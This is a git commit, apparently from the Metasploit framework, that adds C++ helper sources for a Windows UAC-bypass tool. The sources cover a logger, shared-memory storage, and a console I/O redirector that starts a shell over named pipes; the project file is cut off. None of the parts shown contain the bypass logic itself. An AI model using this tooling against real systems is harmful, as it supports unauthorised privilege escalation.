Add bypassuac source to the tree
git-svn-id: file:///home/svn/framework3/trunk@11484 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c003e4b8ef
commit
5d23306f01
|
@ -0,0 +1,231 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include "CMMN.h"
|
||||
|
||||
#include <Shlobj.h>
|
||||
|
||||
#include <sstream>
|
||||
#include <windows.h>
|
||||
#include <WinIOCtl.h>
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
std::wstring CError::Format( DWORD ErrorCode )
|
||||
{
|
||||
return Format( ErrorCode, NULL, NULL );
|
||||
}
|
||||
|
||||
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
|
||||
{
|
||||
LPVOID lpvMessageBuffer;
|
||||
|
||||
FormatMessage(
|
||||
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
|
||||
NULL, ErrorCode,
|
||||
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
|
||||
(LPTSTR)&lpvMessageBuffer, 0, NULL);
|
||||
|
||||
std::wstring result;
|
||||
|
||||
std::wostringstream es(TEXT(""));
|
||||
es << ErrorCode;
|
||||
|
||||
if ( Title )
|
||||
{ result.append( Title ); result.append( TEXT("\n") ); }
|
||||
else
|
||||
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
|
||||
|
||||
if ( API )
|
||||
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
|
||||
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
|
||||
if( lpvMessageBuffer )
|
||||
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
|
||||
|
||||
if ( lpvMessageBuffer )
|
||||
{ LocalFree(lpvMessageBuffer); }
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name, std::wstring& String)
|
||||
{
|
||||
CInterprocessStorage *storage = Create( Name );
|
||||
if ( !storage )
|
||||
return NULL;
|
||||
|
||||
storage->SetString( String );
|
||||
return storage;
|
||||
}
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name)
|
||||
{
|
||||
if ( !Name )
|
||||
return NULL;
|
||||
|
||||
HANDLE hMap = CreateFileMapping( NULL, NULL, PAGE_READWRITE, 0, MaxSize, Name );
|
||||
if ( hMap )
|
||||
{
|
||||
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
|
||||
if ( view )
|
||||
{
|
||||
memset( view, 0, MaxSize );
|
||||
return new CInterprocessStorage( Name, hMap, view );
|
||||
}
|
||||
|
||||
CloseHandle( hMap );
|
||||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Open(const TCHAR *Name)
|
||||
{
|
||||
if ( !Name )
|
||||
return NULL;
|
||||
|
||||
HANDLE hMap = OpenFileMapping( FILE_MAP_ALL_ACCESS, TRUE, Name );
|
||||
if ( hMap )
|
||||
{
|
||||
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
|
||||
if ( view )
|
||||
return new CInterprocessStorage( Name, hMap, view );
|
||||
|
||||
CloseHandle( hMap );
|
||||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
CInterprocessStorage::CInterprocessStorage(const TCHAR *Name, HANDLE Mapping, LPVOID Base)
|
||||
: _Name(Name), _hMapping(Mapping), _pBase(Base)
|
||||
{
|
||||
}
|
||||
|
||||
std::wstring CInterprocessStorage::GetName()
|
||||
{
|
||||
return std::wstring( _Name );
|
||||
}
|
||||
|
||||
void CInterprocessStorage::GetString(std::wstring &String)
|
||||
{
|
||||
String.assign( reinterpret_cast<TCHAR *>(_pBase) );
|
||||
}
|
||||
|
||||
void CInterprocessStorage::SetString(std::wstring &String)
|
||||
{
|
||||
size_t count = min( String.size(), MaxCount - 1 );
|
||||
memcpy( _pBase, String.data(), count * sizeof(TCHAR) );
|
||||
*(reinterpret_cast<TCHAR *>(_pBase) + count) = 0;
|
||||
}
|
||||
|
||||
bool CInterprocessStorage::GetString( const TCHAR *Name, std::wstring& String )
|
||||
{
|
||||
CInterprocessStorage *storage = Open( Name );
|
||||
if ( !storage )
|
||||
return false;
|
||||
|
||||
storage->GetString( String );
|
||||
delete storage;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
CInterprocessStorage::~CInterprocessStorage()
|
||||
{
|
||||
UnmapViewOfFile( _pBase );
|
||||
CloseHandle( _hMapping );
|
||||
}
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
std::wstring CLogger::GetPath()
|
||||
{
|
||||
std::wstring path;
|
||||
|
||||
TCHAR buffer[MAX_PATH];
|
||||
if ( GetTempPath( MAX_PATH, buffer ) )
|
||||
{
|
||||
path.assign( buffer );
|
||||
path.append( TEXT("w7e.log") );
|
||||
}
|
||||
|
||||
return path;
|
||||
}
|
||||
|
||||
void CLogger::Reset()
|
||||
{
|
||||
DeleteFile( GetPath().c_str() );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( std::wstring& Text )
|
||||
{
|
||||
std::wstring tmp( Text.c_str() );
|
||||
tmp.append( TEXT("\n") );
|
||||
Log( tmp );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( )
|
||||
{
|
||||
Log( TEXT("\n") );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( const TCHAR *Text )
|
||||
{
|
||||
if ( Text )
|
||||
LogLine( std::wstring( Text ) );
|
||||
}
|
||||
|
||||
void CLogger::Log( const TCHAR Char )
|
||||
{
|
||||
std::wstring tmp;
|
||||
tmp.append( &Char, 1 );
|
||||
Log( tmp );
|
||||
}
|
||||
|
||||
void CLogger::Log( const TCHAR *Text )
|
||||
{
|
||||
if ( Text )
|
||||
Log( std::wstring( Text ) );
|
||||
}
|
||||
|
||||
void CLogger::Log( std::wstring& Text )
|
||||
{
|
||||
TCHAR buffer[MAX_PATH];
|
||||
//
|
||||
// We have to check it every time to be reflective if user created this file
|
||||
// while program was runnig.
|
||||
//
|
||||
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
|
||||
{
|
||||
std::wstring dbg( buffer );
|
||||
dbg.append( TEXT(".debug") );
|
||||
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
|
||||
if ( INVALID_HANDLE_VALUE == hdbg )
|
||||
return;
|
||||
|
||||
CloseHandle( hdbg );
|
||||
}
|
||||
|
||||
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
|
||||
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
|
||||
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
|
||||
if( INVALID_HANDLE_VALUE != hFile )
|
||||
{
|
||||
SetFilePointer( hFile, 0, NULL, FILE_END );
|
||||
|
||||
DWORD written;
|
||||
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
|
||||
|
||||
CloseHandle( hFile );
|
||||
}
|
||||
if ( mutex ) ReleaseMutex( mutex );
|
||||
if ( mutex ) CloseHandle( mutex );
|
||||
}
|
|
@ -0,0 +1,108 @@
|
|||
#pragma once
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
//
|
||||
// By Pavel
|
||||
//
|
||||
// This class is used for holding some data in the memory that can be accessed
|
||||
// from any saparate process in the system by its name.
|
||||
// It uses memeory mapped files with fixed size sections. Size is enough to hold
|
||||
// as many chars as system supports for file paths.
|
||||
//
|
||||
// Once instance was created, it can be accessed from the another progect by the name.
|
||||
// This shared object will be cleaned up when the last instance of this class will be destroyed
|
||||
// across whole system.
|
||||
//
|
||||
// Generally, it is used following:
|
||||
// 1. Create the first instance, set up data, keep it alive forever
|
||||
// 2. Access to created object by its name from another prject by creating
|
||||
// temporary instance of that object. After you dont need this object, destroy it.
|
||||
//
|
||||
|
||||
class CInterprocessStorage {
|
||||
public:
|
||||
static const size_t MaxSize = MAX_PATH;
|
||||
static const size_t MaxCount = MAX_PATH / sizeof(TCHAR);
|
||||
|
||||
//
|
||||
// Creates initial named object or opens existing, incrementing its reference count.
|
||||
// Resets all object's contents.
|
||||
//
|
||||
static CInterprocessStorage *Create( const TCHAR * Name );
|
||||
//
|
||||
// Creates initial named object or opens existing, incrementing its reference count,
|
||||
// sets its value to the specified string
|
||||
//
|
||||
static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String );
|
||||
|
||||
//
|
||||
// Opens existing named object. Does not modify its data.
|
||||
//
|
||||
static CInterprocessStorage *Open( const TCHAR * Name );
|
||||
|
||||
//
|
||||
// Queries object's name.
|
||||
//
|
||||
std::wstring GetName();
|
||||
|
||||
//
|
||||
// Queries object's value
|
||||
//
|
||||
void GetString( std::wstring& String );
|
||||
|
||||
//
|
||||
// Tries to get named object's value, accessing one by the name.
|
||||
//
|
||||
static bool GetString( const TCHAR *Name, std::wstring& String );
|
||||
|
||||
//
|
||||
// Sets object's Value
|
||||
//
|
||||
void SetString( std::wstring& String );
|
||||
|
||||
~CInterprocessStorage();
|
||||
|
||||
private:
|
||||
const HANDLE _hMapping;
|
||||
const LPVOID _pBase;
|
||||
const TCHAR *_Name;
|
||||
CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base );
|
||||
};
|
||||
|
||||
//
|
||||
// Logs data to file.
|
||||
// Log takes place ony if one special file exists. File is named as its hosting application
|
||||
// appended by .debug
|
||||
// Example: Code runs in the explorer.exe => log will be allowed if near the exe
|
||||
// will be placed file explorer.exe.debug
|
||||
//
|
||||
// It uses mutual execution to prevent unreadable content of the log file.
|
||||
// Log file has path = %temp%w7e.og
|
||||
//
|
||||
// FILE_FLAG_WRITE_THROUGH flag is used to prevent log to be unsaved if application crashed.
|
||||
//
|
||||
class CLogger {
|
||||
public:
|
||||
static void LogLine( std::wstring& Text );
|
||||
static void LogLine( const TCHAR *Text );
|
||||
static void LogLine( );
|
||||
static void Log( std::wstring& Text );
|
||||
static void Log( const TCHAR *Text );
|
||||
static void Log( const TCHAR Char );
|
||||
static void Reset( );
|
||||
|
||||
private:
|
||||
static std::wstring GetPath();
|
||||
};
|
||||
|
||||
//
|
||||
// Formats system error codes that were obtained by calling GetLastError.
|
||||
//
|
||||
class CError {
|
||||
public:
|
||||
static std::wstring Format( DWORD ErrorCode );
|
||||
static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API );
|
||||
};
|
|
@ -0,0 +1,99 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include "CMMN.h"
|
||||
#include "Redirector.h"
|
||||
#include <windows.h>
|
||||
|
||||
const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In");
|
||||
const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out");
|
||||
const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err");
|
||||
|
||||
DWORD WINAPI Redirector( LPVOID Parameter )
|
||||
{
|
||||
assert( Parameter );
|
||||
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
||||
|
||||
CLogger::Log( TEXT("Hello redirector thread: ") );
|
||||
CLogger::LogLine( pair->Name );
|
||||
|
||||
CHAR read_buff[2];
|
||||
DWORD nBytesRead,nBytesWrote;
|
||||
|
||||
bool was_0d = false;
|
||||
bool error = false;
|
||||
while ( ! error )
|
||||
{
|
||||
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("ReadFile") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
|
||||
if ( pair->Linux )
|
||||
{
|
||||
if ( ! was_0d )
|
||||
{
|
||||
if ( read_buff[0] == 0xa )
|
||||
{
|
||||
read_buff[0] = 0xd;
|
||||
read_buff[1] = 0xa;
|
||||
nBytesRead = 2;
|
||||
}
|
||||
}
|
||||
was_0d = read_buff[nBytesRead - 1] == 0x0d;
|
||||
}
|
||||
|
||||
for ( DWORD i = 0; i < nBytesRead; i++ )
|
||||
{
|
||||
if ( pair->DestinationConsole )
|
||||
{
|
||||
//
|
||||
// Emulate console input.
|
||||
//
|
||||
|
||||
INPUT_RECORD inp = {0};
|
||||
inp.EventType = KEY_EVENT;
|
||||
inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i];
|
||||
inp.Event.KeyEvent.wRepeatCount = 1;
|
||||
inp.Event.KeyEvent.wVirtualKeyCode = 0;
|
||||
inp.Event.KeyEvent.wVirtualScanCode = 0;
|
||||
inp.Event.KeyEvent.bKeyDown = TRUE;
|
||||
inp.Event.KeyEvent.dwControlKeyState = 0;
|
||||
|
||||
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("WriteConsoleInput") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("WriteFile") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
CLogger::Log( TEXT("Bye redirector thread: ") );
|
||||
CLogger::LogLine( pair->Name );
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
|
@ -0,0 +1,44 @@
|
|||
#pragma once
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
//
|
||||
// By Pavel
|
||||
|
||||
//
|
||||
// Defines names of pipes that can be accessed by name for redirecting IO.
|
||||
//
|
||||
const extern TCHAR *STDIn_PIPE;
|
||||
const extern TCHAR *STDOut_PIPE;
|
||||
const extern TCHAR *STDErr_PIPE;
|
||||
|
||||
//
|
||||
// Structure that is passed to newly created thread.
|
||||
// Defines how to redirect IO
|
||||
//
|
||||
typedef struct _TRedirectorPair {
|
||||
HANDLE Source;
|
||||
HANDLE Destination;
|
||||
//
|
||||
// Uses directly Console IO instead of ReadFile and WriteFile
|
||||
//
|
||||
bool DestinationConsole;
|
||||
HANDLE Thread;
|
||||
//
|
||||
// If true, prevent thread's exit on any IO error.
|
||||
//
|
||||
bool KeepAlive;
|
||||
std::wstring Name;
|
||||
//
|
||||
// Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes)
|
||||
//
|
||||
bool Linux;
|
||||
}TRedirectorPair;
|
||||
|
||||
DWORD WINAPI Redirector( LPVOID Parameter );
|
||||
|
|
@ -0,0 +1,147 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include ".\..\Redirector.h"
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
//
|
||||
// By Pavels
|
||||
//
|
||||
// This application is used for redirection data from the console to the pipes,
|
||||
// not useng pipes at the other side.
|
||||
// It is caused by some differences when using some other proceses which
|
||||
// also redirect data. Main reason is differences in ReadConsole and ReadFile
|
||||
// methods.
|
||||
// Using this redirector app, child process will never know that his parent redirects it's IO.
|
||||
//
|
||||
// Everything is asynchronous. 3 Threads.
|
||||
//
|
||||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
CLogger::LogLine(TEXT("TIOR: Hello"));
|
||||
|
||||
TRedirectorPair in = {0};
|
||||
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
//in.KeepAlive = true;
|
||||
in.Name.assign(TEXT("TIOR: [in]"));
|
||||
if ( INVALID_HANDLE_VALUE != in.Source )
|
||||
{
|
||||
in.Destination = GetStdHandle( STD_INPUT_HANDLE );
|
||||
in.DestinationConsole = true;
|
||||
if ( INVALID_HANDLE_VALUE != in.Destination )
|
||||
in.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&in, 0, NULL);
|
||||
}
|
||||
|
||||
TRedirectorPair out = {0};
|
||||
out.Destination = CreateFile( STDOut_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
out.KeepAlive = true;
|
||||
out.Name.assign(TEXT("TIOR: [out]"));
|
||||
if ( INVALID_HANDLE_VALUE != out.Destination )
|
||||
{
|
||||
SECURITY_ATTRIBUTES sa;
|
||||
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
|
||||
sa.lpSecurityDescriptor = NULL;
|
||||
sa.bInheritHandle = TRUE;
|
||||
|
||||
HANDLE tmp;
|
||||
CreatePipe(&out.Source,&tmp,&sa,0);
|
||||
SetStdHandle( STD_OUTPUT_HANDLE, tmp );
|
||||
out.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&out, 0, NULL);
|
||||
}
|
||||
|
||||
TRedirectorPair err = {0};
|
||||
err.Destination = CreateFile( STDErr_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
err.KeepAlive = true;
|
||||
err.Name.assign(TEXT("TIOR: [err]"));
|
||||
if ( INVALID_HANDLE_VALUE != err.Destination )
|
||||
{
|
||||
SECURITY_ATTRIBUTES sa;
|
||||
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
|
||||
sa.lpSecurityDescriptor = NULL;
|
||||
sa.bInheritHandle = TRUE;
|
||||
|
||||
HANDLE tmp;
|
||||
CreatePipe(&err.Source,&tmp,&sa,0);
|
||||
SetStdHandle( STD_ERROR_HANDLE, tmp );
|
||||
err.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&err, 0, NULL);
|
||||
}
|
||||
|
||||
///////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
//
|
||||
// Obtainig information about process to start and redirect
|
||||
//
|
||||
|
||||
std::wstring shell, args, dir;
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORShell"), shell );
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
|
||||
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
|
||||
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
|
||||
|
||||
STARTUPINFO si = {0};si.cb = sizeof(si);
|
||||
PROCESS_INFORMATION pi = {0};
|
||||
|
||||
BOOL created = CreateProcess(
|
||||
shell.c_str(),
|
||||
const_cast<TCHAR *>(args.c_str()),
|
||||
NULL,
|
||||
NULL,
|
||||
TRUE,
|
||||
0,
|
||||
NULL,
|
||||
dir.c_str(),
|
||||
&si,
|
||||
&pi );
|
||||
|
||||
if ( ! created )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
TEXT("TIOR: Unable to create child process"),
|
||||
TEXT("CreateProcess")));
|
||||
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
else
|
||||
{
|
||||
CloseHandle( pi.hThread );
|
||||
}
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
|
||||
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
||||
//
|
||||
// Waiting for eny handle to be freed.
|
||||
// Either some IO thread will die or process will be oevered.
|
||||
//
|
||||
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
||||
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
|
||||
|
||||
//
|
||||
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
||||
// Thats why we wait again for some period of time reading died process's output untill the end.
|
||||
//
|
||||
WaitForMultipleObjects( 3, waiters + 1, FALSE, 1000 );
|
||||
|
||||
//
|
||||
// Dont forget to close child process. We need to be sure, if user terminated app which
|
||||
// reads our redirected data, we terminate the target child app.
|
||||
//
|
||||
CLogger::LogLine(TEXT("TIOR: Killing child process"));
|
||||
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
||||
CloseHandle( pi.hProcess );
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: Exit"));
|
||||
|
||||
//
|
||||
// I will not close any handles here - system will terminate and close all by it self.
|
||||
//
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
|
@ -0,0 +1,175 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{B36517F4-984C-422C-ADF9-85D5ACD4E30B}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>TIOR</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
